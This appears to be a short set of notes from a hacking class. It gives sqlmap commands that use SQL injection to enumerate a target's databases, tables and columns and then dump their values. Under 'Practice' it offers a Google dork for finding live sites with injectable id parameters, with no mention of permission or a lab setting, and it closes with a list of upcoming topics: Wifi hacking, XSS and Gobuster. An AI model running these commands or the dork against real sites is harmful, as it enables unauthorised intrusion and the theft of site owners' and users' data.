#Class-01

Enumerate Database Command:
->sqlmap tool command:
sqlmap -u  target_url --batch --dbs

Enumerate Table Command:
->sqlmap -u  target_url --batch -D database_name --tables

Enumerate Column Command:
->sqlmap -u  target_url --batch -D database_name -T table_name --columns

Enumerate Column Values Command:
->sqlmap -u  target_url --batch -D database_name -T table_name -C column_names --dump


Practice:

Google Dork: index.php?id=site.in

Next Class Topic:

	-> Wifi Hacking
	-> XSS (Cross Site Scripting)
	-> Gobuster Tools
